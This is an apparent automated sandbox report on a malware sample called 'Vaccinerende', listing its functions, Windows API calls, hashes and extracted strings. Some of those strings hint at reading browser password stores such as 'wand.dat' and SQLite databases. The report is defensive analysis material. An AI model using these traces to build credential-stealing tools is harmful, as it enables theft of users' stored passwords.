                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcsicmpmemset
                                                                              • String ID: edit
                                                                              • API String ID: 2747424523-2167791130
                                                                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                              Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 3150196962-1506664499
                                                                              • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                              • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                              Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                              • memcmp.MSVCRT ref: 0041D8CB
                                                                              • memcmp.MSVCRT ref: 0041D913
                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memcmp
                                                                              • String ID:
                                                                              • API String ID: 3384217055-0
                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                              Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$memcpy
                                                                              • String ID:
                                                                              • API String ID: 368790112-0
                                                                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                              Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                              • String ID:
                                                                              • API String ID: 1889144086-0
                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                              Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                              • String ID:
                                                                              • API String ID: 1661045500-0
                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                              Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                              Strings
                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpymemset
                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                              • API String ID: 1297977491-2063813899
                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040560C
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                              • String ID: *.*$dat$wand.dat
                                                                              • API String ID: 2618321458-1828844352
                                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                              Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                              • String ID:
                                                                              • API String ID: 1549203181-0
                                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00412057
                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                              • String ID:
                                                                              • API String ID: 3550944819-0
                                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                              Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • free.MSVCRT ref: 0040F561
                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$free
                                                                              • String ID: g4@
                                                                              • API String ID: 2888793982-2133833424
                                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                              Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: @
                                                                              • API String ID: 3510742995-2766056989
                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                              Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                              • memset.MSVCRT ref: 0040AF18
                                                                              • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@memcpymemset
                                                                              • String ID:
                                                                              • API String ID: 1865533344-0
                                                                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004144E7
                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                              • memset.MSVCRT ref: 0041451A
                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                              • String ID:
                                                                              • API String ID: 1127616056-0
                                                                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                              Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                              • memset.MSVCRT ref: 0042FED3
                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: sqlite_master
                                                                              • API String ID: 438689982-3163232059
                                                                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                              Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3917621476-0
                                                                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                              Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                              Memory Dump Source
